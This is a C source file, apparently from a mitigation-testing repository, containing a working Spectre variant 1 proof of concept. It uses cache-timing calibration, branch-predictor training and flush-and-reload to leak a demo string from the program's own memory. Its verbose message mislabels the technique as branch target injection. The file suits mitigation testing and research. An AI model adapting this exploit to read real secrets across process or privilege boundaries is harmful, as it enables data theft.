4a0dacbfa3
- GCC support - RETPOLINE for both GCC and clang - LLD dynamic linker to support RETPOLINE mitigations on dynamic executables - Results aggregation using SFTP
272 lines
7.0 KiB
C
272 lines
7.0 KiB
C
#include <errno.h>
#include <getopt.h>
#include <inttypes.h>
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

#if defined(__i386__) || defined(__amd64__)
/* Cache line size in bytes assumed by calibrate_threshold(). */
#define CACHELINESIZE 64
/* Non-zero once calibrate_threshold() has detected RDTSCP via CPUID. */
static int _has_rdtscp;
#else
#error "unsupported architecture"
#endif

/* Bit tested in EDX after CPUID leaf 0x80000001 to detect RDTSCP. */
#define HAVE_RDTSCP (1U << 27)

/*
 * The string main() tries to recover; malicious_x is derived from the
 * distance between this string and array1. It is a string literal, so the
 * pointee is const.
 */
const char *secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion.";

/* Bound checked by victim_function(); leak() flushes it before each call. */
unsigned int array1_size = 16;
/* Not referenced elsewhere in this file; presumably padding around array1. */
uint8_t unused1[64];
/* Array indexed by victim_function(); only the first 16 entries are non-zero. */
uint8_t array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
/* Not referenced elsewhere in this file; presumably padding around array1. */
uint8_t unused2[64];
/* Probe array: one slot every 512 bytes for each of the 256 byte values. */
uint8_t array2[256 * 512];
/* Used so the compiler won't optimize out victim_function(). */
uint8_t temp = 0;
/* Access times at or below this value are counted as cache hits by leak(). */
unsigned cache_hit_threshold;
/* Incremented once per -v option in main(). */
int verbose;

static inline unsigned
|
||
timed_access(
|
||
volatile uint8_t *addr
|
||
)
|
||
{
|
||
uint64_t t0, t1;
|
||
#pragma GCC diagnostic ignored "-Wuninitialized"
|
||
unsigned int junk = junk;
|
||
|
||
if (_has_rdtscp) {
|
||
t0 = __rdtscp(& junk);
|
||
junk |= *addr;
|
||
t1 = __rdtscp(& junk);
|
||
} else {
|
||
t0 = __rdtsc();
|
||
junk |= *addr;
|
||
t1 = __rdtsc();
|
||
}
|
||
|
||
return (unsigned)(t1 - t0);
|
||
}
|
||
|
||
/*
 * Execute the CPUID instruction.
 *
 * eax: in: leaf number;    out: EAX result.
 * ebx:                     out: EBX result.
 * ecx: in: sub-leaf value; out: ECX result.
 * edx:                     out: EDX result.
 *
 * Spelled with __asm__/__volatile__ so it also compiles in strict ISO
 * modes (e.g. -std=c11), where plain `asm` is not a keyword.
 */
static inline void
native_cpuid(unsigned int *eax, unsigned int *ebx,
             unsigned int *ecx, unsigned int *edx)
{
    __asm__ __volatile__("cpuid"
        : "=a" (*eax),
          "=b" (*ebx),
          "=c" (*ecx),
          "=d" (*edx)
        : "0" (*eax), "2" (*ecx));
}

static void
|
||
calibrate_threshold(
|
||
int verbose,
|
||
unsigned int *threshold
|
||
)
|
||
{
|
||
volatile char buf[2 * CACHELINESIZE];
|
||
volatile uint8_t *bufp;
|
||
int i;
|
||
const int cnt = 1000;
|
||
uint64_t tcache, tmem;
|
||
unsigned eax, ebx, ecx, edx;
|
||
__attribute__((unused)) volatile int junk = 0;
|
||
|
||
eax = 0x80000001; // Has RDTSCP ?
|
||
ecx = 0;
|
||
native_cpuid(&eax, &ebx, &ecx, &edx);
|
||
if (edx & HAVE_RDTSCP) {
|
||
switch (verbose) {
|
||
case 1:
|
||
fprintf(stderr, "CPU has RDTSCP.\n");
|
||
break;
|
||
case 2:
|
||
fprintf(stdout, "CPU has RDTSCP.\n");
|
||
break;
|
||
}
|
||
_has_rdtscp = 1;
|
||
} else {
|
||
switch (verbose) {
|
||
case 1:
|
||
fprintf(stderr, "WARNING: CPU has no RDTSCP support, using RDTSC.\n");
|
||
break;
|
||
case 2:
|
||
fprintf(stdout, "WARNING: CPU has no RDTSCP support, using RDTSC.\n");
|
||
break;
|
||
}
|
||
_has_rdtscp = 0;
|
||
}
|
||
|
||
bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINESIZE) &
|
||
~(CACHELINESIZE - 1)));
|
||
|
||
junk |= *bufp;
|
||
for (i = 0, tcache = 0; i < cnt; i++)
|
||
tcache += timed_access(bufp);
|
||
tcache /= cnt;
|
||
|
||
for (i = 0, tmem = 0; i < cnt; i++) {
|
||
_mm_clflush((const void *)bufp);
|
||
_mm_mfence();
|
||
tmem += timed_access(bufp);
|
||
}
|
||
tmem /= cnt;
|
||
if (threshold != NULL) {
|
||
*threshold = tcache + (tmem - tcache) / 2;
|
||
if (*threshold == (unsigned int)tmem)
|
||
(*threshold)--;
|
||
}
|
||
|
||
switch (verbose) {
|
||
case 1:
|
||
fprintf(stderr, "Access time: memory %lu, cache %lu", tmem, tcache);
|
||
if (threshold)
|
||
fprintf(stderr, " -> threshold %d", *threshold);
|
||
fprintf(stderr, "\n");
|
||
break;
|
||
case 2:
|
||
fprintf(stdout, "Access time: memory %lu, cache %lu", tmem, tcache);
|
||
if (threshold)
|
||
fprintf(stdout, " -> threshold %d", *threshold);
|
||
fprintf(stdout, "\n");
|
||
break;
|
||
}
|
||
return;
|
||
}
|
||
|
||
void
|
||
victim_function(
|
||
size_t x
|
||
)
|
||
{
|
||
if (x < array1_size) {
|
||
temp &= array2[array1[x] * 512];
|
||
}
|
||
}
|
||
|
||
void
|
||
leak(
|
||
size_t malicious_x,
|
||
uint8_t value[2],
|
||
int score[2],
|
||
unsigned cache_hit_threshold
|
||
)
|
||
{
|
||
static int results[256];
|
||
int tries, i, j, mix_i;
|
||
unsigned int junk = 0;
|
||
size_t training_x, x;
|
||
volatile uint8_t *addr;
|
||
|
||
for (i = 0; i < 256; i++)
|
||
results[i] = 0;
|
||
for (tries = 999; tries > 0; tries--) {
|
||
|
||
/* Flush array2[256*(0..255)] from cache */
|
||
for (i = 0; i < 256; i++)
|
||
_mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */
|
||
|
||
/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
|
||
training_x = tries % array1_size;
|
||
for (j = 29; j >= 0; j--) {
|
||
_mm_clflush(&array1_size);
|
||
for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */
|
||
//_mm_mfence(); NOT WORKING
|
||
/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
|
||
/* Avoid jumps in case those tip off the branch predictor */
|
||
x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
|
||
x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
|
||
x = training_x ^ (x & (malicious_x ^ training_x));
|
||
/* Call the victim! */
|
||
victim_function(x);
|
||
|
||
}
|
||
|
||
/* Time reads. Order is lightly mixed up to prevent stride prediction */
|
||
for (i = 0; i < 256; i++) {
|
||
mix_i = ((i * 167) + 13) & 255;
|
||
addr = & array2[mix_i * 512];
|
||
if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size])
|
||
results[mix_i]++; /* cache hit - add +1 to score for this value */
|
||
}
|
||
|
||
/* Locate highest results in j */
|
||
j = -1;
|
||
for (i = 0; i < 256; i++) {
|
||
if (j < 0 || results[i] >= results[j]) {
|
||
j = i;
|
||
}
|
||
}
|
||
if (results[j] >= 3)
|
||
break;
|
||
}
|
||
|
||
results[0] ^= junk; /* use junk so code above won’t get optimized out*/
|
||
value[0] = (uint8_t) j;
|
||
score[0] = results[j];
|
||
}
|
||
|
||
int
|
||
main(
|
||
int argc,
|
||
char** argv
|
||
)
|
||
{
|
||
int o;
|
||
size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */
|
||
int i, score[2], len = (int)strlen(secret);
|
||
uint8_t value[2];
|
||
unsigned sucesses = 0;
|
||
|
||
while ((o = getopt(argc, argv, "t:vc")) != EOF) {
|
||
switch (o) {
|
||
case 't':
|
||
cache_hit_threshold = atoi(optarg);
|
||
break;
|
||
case 'v':
|
||
verbose++;
|
||
break;
|
||
case 'c':
|
||
calibrate_threshold(2, &cache_hit_threshold);
|
||
return 0;
|
||
default:
|
||
usage:
|
||
fprintf(stderr, "usage: %s [-v] [-c] "
|
||
"[-t threshold]\n", argv[0]);
|
||
return 2;
|
||
}
|
||
}
|
||
if (argc != optind)
|
||
goto usage;
|
||
|
||
calibrate_threshold(verbose, cache_hit_threshold ? NULL : &cache_hit_threshold);
|
||
for (i = 0; i < (int)sizeof(array2); i++)
|
||
array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
|
||
if(verbose) {
|
||
fprintf(stderr, "Leaking %d bytes using Branch Target Injection:\n", (int)strlen(secret));
|
||
}
|
||
while (--len >= 0) {
|
||
leak(malicious_x++, value, score, cache_hit_threshold);
|
||
if(score[0] == 3 && value[0] > 31 && value[0] < 127) {
|
||
sucesses++;
|
||
fprintf(stderr, "\033[32m%c\033[0m", (value[0]));
|
||
} else {
|
||
fprintf(stderr, "\033[31m?\033[0m");
|
||
}
|
||
}
|
||
fprintf(stderr, "\n");
|
||
printf("%s: %.0f %%\n", argv[0] + 2, 100 * sucesses / (float)strlen(secret));
|
||
|
||
return 0;
|
||
}
|